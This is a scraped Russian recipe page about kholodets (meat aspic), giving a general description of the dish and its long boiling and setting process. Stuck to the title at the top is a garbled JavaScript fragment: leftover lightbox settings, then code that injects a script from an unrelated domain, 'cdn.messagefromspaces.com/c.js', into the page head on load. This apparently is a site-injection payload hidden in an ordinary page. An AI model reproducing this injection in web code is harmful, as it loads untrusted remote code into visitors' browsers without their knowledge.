Холодец | Рецепт холодца , 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Холодец

Холодец — отличное холодное мясное блюдо которое готовится методом долгой варки с применением мяса курицы, свинины или говядины. Холодец имеет разнообразный способ приготовления, но каждый из них имеет право на существование, потому что из любого такого рецепта получается оригинальное блюдо из мяса, которое мы так все обожаем. Издавна принято, что праздничный торжественный стол обычно не лишен холодца, который неплохо идет практически с любым гарниром. Каждый кулинар знает собственный рецепт приготовления холодца или студня, как некоторые его еще называют.

Рецепт знаменитого холодца

Ничего сложного в приготовлении знаменитого холодца нет, просто сам процесс варки занимает большое количество времени от 4 до 6 часов. Но здесь не стоит расстраиваться и пугаться длительности его готовки. В тот момент когда мясо будет вариться будет уйма свободного времени для занятия другими делами. А после полного приготовления мяса останется только дать ему остыть в кастрюле, вынуть вареное мясо, полностью отделить его от кости и разделать на мелкие кусочки, затем разложить по емкостям и залить их оставшимся бульоном и поместить холодец в прохладное место до полного его застывания. Поэтому, любой желающий приготовить это блюдо, придерживаясь наших советов, без труда справится с его приготовлением.

Другие рецепты:

Leave a Reply